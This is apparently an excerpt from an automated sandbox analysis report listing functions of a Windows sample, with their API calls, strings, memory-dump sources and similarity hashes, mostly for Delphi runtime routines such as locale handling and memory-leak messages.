                                                                                                                  • Opcode Fuzzy Hash: 1ca47c8ba3a81762b4421bee666ac1a0309ecbeb84c6d260fdcdcd5bc6f48df8
                                                                                                                  • Instruction Fuzzy Hash: E4F09D74A44301DFD350DF28D441A1AB7E9FF48B94F808DAAEA9887380E734D8148B52
                                                                                                                  Function 02B1A810 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02B1BE72,00000000,02B1C08B,?,?,00000000,00000000), ref: 02B1A823
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoLocale
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2299586839-0
                                                                                                                  • Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                  • Instruction ID: d587ccab2ad496537fb049c2a83c85784c3b01e094b5767708e64874f5dbb2d0
                                                                                                                  • Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                  • Instruction Fuzzy Hash: 1CD05EA670E2602AA210A15A2D84DBB5ADCCFC67A1F8040BAB988C6101D210DD07DAB1
                                                                                                                  Function 02B1920C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LocalTime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 481472006-0
                                                                                                                  • Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                  • Instruction ID: 52f9ffa0ec4a7821e472b7f731096f940d11e3a87547e6358cbbc9d5af24f82d
                                                                                                                  • Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                  • Instruction Fuzzy Hash: F0A0124040582041854033180C0257431455921A20FC4878068F8402D0E91D01208093
                                                                                                                  Function 02B3E596 Relevance: .2, Instructions: 230COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b8f48c83d60ec04afcc440658e9edcae53144a8f5eed22574b4dcd881eaa9552
                                                                                                                  • Instruction ID: ad094222e8ab89433bdfb0a4f0738175db57157dceb9e37475d37bda369656cf
                                                                                                                  • Opcode Fuzzy Hash: b8f48c83d60ec04afcc440658e9edcae53144a8f5eed22574b4dcd881eaa9552
                                                                                                                  • Instruction Fuzzy Hash: 0351599294E7D14FC7634B7844A92C23FB0AD7762435E51CBC8D09F1A3E209990BDB61
                                                                                                                  Function 02B1C98E Relevance: .2, Instructions: 227COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 337ad80de26523312585dd798073f80bc2648116be0ac6775d459a67f91f93b6
                                                                                                                  • Instruction ID: aa01cb98ed2e4accbb3d845075dbed72fc7ffd512b30cefb4a665bc4976dd085
                                                                                                                  • Opcode Fuzzy Hash: 337ad80de26523312585dd798073f80bc2648116be0ac6775d459a67f91f93b6
                                                                                                                  • Instruction Fuzzy Hash: FF9155A1E592C44FE316AB7884BA7963F52CFA3344FDA00EEC1954F2E3DC1D98068B55
                                                                                                                  Function 02B120C4 Relevance: .1, Instructions: 94COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                  • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                  • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                  • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                  Function 02B1D294 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02B1D29D
                                                                                                                    • Part of subcall function 02B1D268: GetProcAddress.KERNEL32(00000000), ref: 02B1D281
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                  • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                  • API String ID: 1646373207-1918263038
                                                                                                                  • Opcode ID: b443657c2734cd024e7598013f2844046adc9808b9b82cd93c0809a548f52abf
                                                                                                                  • Instruction ID: ab797fb8c09b08b16e4b5de84b03299ad6174d89a9e79b7915815f80c00cded5
                                                                                                                  • Opcode Fuzzy Hash: b443657c2734cd024e7598013f2844046adc9808b9b82cd93c0809a548f52abf
                                                                                                                  • Instruction Fuzzy Hash: 5C4180E3AA830A5B52086B6EB500427FBDED345B503E046DBF884CB384DD74FC518A6E
                                                                                                                  Function 02B26ED8 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02B26EDE
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02B26EEF
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02B26EFF
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02B26F0F
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02B26F1F
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02B26F2F
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02B26F3F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                  • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                  • API String ID: 667068680-2233174745
                                                                                                                  • Opcode ID: 8f5a95351153522a1582fba12d6dd480a43677f41fb71cb39ff725e988e19850
                                                                                                                  • Instruction ID: a25fb6b2bde3ef0bcc12d3f4fc15160cb17dd42138a1a575ed5fffbaa3f07075
                                                                                                                  • Opcode Fuzzy Hash: 8f5a95351153522a1582fba12d6dd480a43677f41fb71cb39ff725e988e19850
                                                                                                                  • Instruction Fuzzy Hash: E8F050F0A8A351BDBF00FB745CC18AA375DAF246443401CD6F91B56556FB75D8188F10
                                                                                                                  Function 02B12530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02B128CE
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Message
                                                                                                                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                  • API String ID: 2030045667-32948583
                                                                                                                  • Opcode ID: 903978b729aacb5ddda16b82b3b9124eaf4e57fbd2b33411e07235d969c7761f
                                                                                                                  • Instruction ID: 5507c5600d56c3f15398d43084f1c377e7a5ebc66945d8ed52f2b813e81388f0
                                                                                                                  • Opcode Fuzzy Hash: 903978b729aacb5ddda16b82b3b9124eaf4e57fbd2b33411e07235d969c7761f
                                                                                                                  • Instruction Fuzzy Hash: 04A1D230A042B88BDF21AA2CCC84B99B7E5EF09350F9441F5ED49AB386CB7599C5CF51
                                                                                                                  Function 02B1252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • The unexpected small block leaks are:, xrefs: 02B12707
                                                                                                                  • , xrefs: 02B12814
                                                                                                                  • Unexpected Memory Leak, xrefs: 02B128C0
                                                                                                                  • 7, xrefs: 02B126A1
                                                                                                                  • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02B12849
                                                                                                                  • bytes: , xrefs: 02B1275D
                                                                                                                  • An unexpected memory leak has occurred. , xrefs: 02B12690
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                  • API String ID: 0-2723507874
                                                                                                                  • Opcode ID: 99f57f3881e2a15a6eef4d32ec7501292bea8005034faeda27033fbad7b4e4fb
                                                                                                                  • Instruction ID: bae71f51e1f4e8534cbb57ed49cab5ffccd1a85b2b893d872a0a95acdb38912b
                                                                                                                  • Opcode Fuzzy Hash: 99f57f3881e2a15a6eef4d32ec7501292bea8005034faeda27033fbad7b4e4fb
                                                                                                                  • Instruction Fuzzy Hash: C571B130A042B88FDF21EA2CCC84BD9BAE5EF09744F9041E5D949EB285DB758AC5CF51
                                                                                                                  Function 02B1BDC0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetThreadLocale.KERNEL32(00000000,02B1C08B,?,?,00000000,00000000), ref: 02B1BDF6
                                                                                                                    • Part of subcall function 02B1A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B1A7E2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Locale$InfoThread
                                                                                                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                  • API String ID: 4232894706-2493093252
                                                                                                                  • Opcode ID: b8227e90d2a097cfddd5d19b250c711e8ca5b5275bdc34d7432c15379972680e
                                                                                                                  • Instruction ID: d14148c337e30014d83076611864d3586be67db5fcd1728b496b6ca07752be80
                                                                                                                  • Opcode Fuzzy Hash: b8227e90d2a097cfddd5d19b250c711e8ca5b5275bdc34d7432c15379972680e
                                                                                                                  • Instruction Fuzzy Hash: EA612135B401489BDB00EBA4D894B9F7BBBDF88700FD098F6E1019B645DA39EA06DF51
                                                                                                                  Function 02B2AFE0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B2B000
                                                                                                                  • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02B2B017
                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B2B0AB
                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000002), ref: 02B2B0B7
                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 02B2B0CB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Read$HandleModule
                                                                                                                  • String ID: KernelBase$LoadLibraryExA
                                                                                                                  • API String ID: 2226866862-113032527
                                                                                                                  • Opcode ID: 5879f9bec06d05b45b446c89e24d0ebea646dde06d61af14613575026d47e791
                                                                                                                  • Instruction ID: f155cd0650f8b316ac0a53285981359ab5518f0d306c32bfe56e2cbf3bc9e26f
                                                                                                                  • Opcode Fuzzy Hash: 5879f9bec06d05b45b446c89e24d0ebea646dde06d61af14613575026d47e791
                                                                                                                  • Instruction Fuzzy Hash: 60317671A40315BBDB21DB68CC85F9E77A8FF05358F044691FA68D72C1DB34A948CBA4
                                                                                                                  Function 02B1435C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B14423,?,?,02B967C8,?,?,02B3E7A8,02B165B1,02B3D30D), ref: 02B14395
                                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B14423,?,?,02B967C8,?,?,02B3E7A8,02B165B1,02B3D30D), ref: 02B1439B
                                                                                                                  • GetStdHandle.KERNEL32(000000F5,02B143E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B14423,?,?,02B967C8), ref: 02B143B0
                                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,02B143E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B14423,?,?), ref: 02B143B6
                                                                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02B143D4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileHandleWrite$Message
                                                                                                                  • String ID: Error$Runtime error at 00000000
                                                                                                                  • API String ID: 1570097196-2970929446
                                                                                                                  • Opcode ID: cea0da9495ffe2cee9e62574b311271e22c32437dfbb118a1ebc825fb3201102
                                                                                                                  • Instruction ID: bef5d682c9f2e70c7491bc5fa255f4bb0a3e19e2733ebf28f773ca4da8d8f5ac
                                                                                                                  • Opcode Fuzzy Hash: cea0da9495ffe2cee9e62574b311271e22c32437dfbb118a1ebc825fb3201102
                                                                                                                  • Instruction Fuzzy Hash: D1F02470AE4344B5FB10A2A47D46F59737C9B04F61FD08AE6F364A60D087F080D58B22
                                                                                                                  Function 02B1AEC4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B1AD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B1AD59
                                                                                                                    • Part of subcall function 02B1AD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B1AD7D
                                                                                                                    • Part of subcall function 02B1AD3C: GetModuleFileNameA.KERNEL32(02B10000,?,00000105), ref: 02B1AD98
                                                                                                                    • Part of subcall function 02B1AD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B1AE2E
                                                                                                                  • CharToOemA.USER32(?,?), ref: 02B1AEFB
                                                                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02B1AF18
                                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B1AF1E
                                                                                                                  • GetStdHandle.KERNEL32(000000F4,02B1AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B1AF33
                                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,02B1AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B1AF39
                                                                                                                  • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02B1AF5B
                                                                                                                  • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02B1AF71
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 185507032-0
                                                                                                                  • Opcode ID: de05d062261b062b3720e633a943cce3674ab3a615a9052b8f08ca36b0300be0
                                                                                                                  • Instruction ID: 0483949353a0906810f6912481a9c17692f5146074b83d9f80c24c71c0db0bd7
                                                                                                                  • Opcode Fuzzy Hash: de05d062261b062b3720e633a943cce3674ab3a615a9052b8f08ca36b0300be0
                                                                                                                  • Instruction Fuzzy Hash: 821127B2549204BEE200FBA4CD85F9B77EDAF44740FC04AA5BB54D70E0DA75E9448B62
                                                                                                                  Function 02B1E58C Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B1E625
                                                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B1E641
                                                                                                                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02B1E67A
                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B1E6F7
                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02B1E710
                                                                                                                  • VariantCopy.OLEAUT32(?,00000000), ref: 02B1E745
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
